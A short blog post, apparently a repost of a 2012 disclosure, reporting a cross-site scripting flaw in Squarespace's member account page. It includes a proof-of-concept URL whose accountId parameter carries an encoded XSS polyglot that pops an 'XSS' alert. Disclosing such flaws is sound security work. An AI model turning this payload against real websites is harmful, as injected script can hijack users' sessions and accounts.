Search This Blog

Powered by Blogger.

Blog Archive

Labels

Cross Site Scripting vulnerability found in Squarespace blogging app


The Grey Hat hacker "Sony" come with some interesting xss find.  One of the popular and and best blogging/Content Management web application Sqaurespace vulnerable to XSS Attack.

Poc:
http://sonystyles.squarespace.com/display/configuration/CreateOrModifyMemberAccount?accountId=2095672%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

The xss attack can be viewed after member login.  Squarespace powers tens of thousands of websites with billions of monthly hits; all of them might be vulnerable to this attack.

About Squarespace:
 a web publishing (blogging/content management)company that sells a software publishing platform and file server service to individuals and businesses, providing them the tools and assistance to create and maintain well-designed websites.

source:
http://st2tea.blogspot.com/2012/02/squarespace-cross-site-scripting.html
Share it:

Vulnerability

Web Application Vulnerability

XSS Vulnerability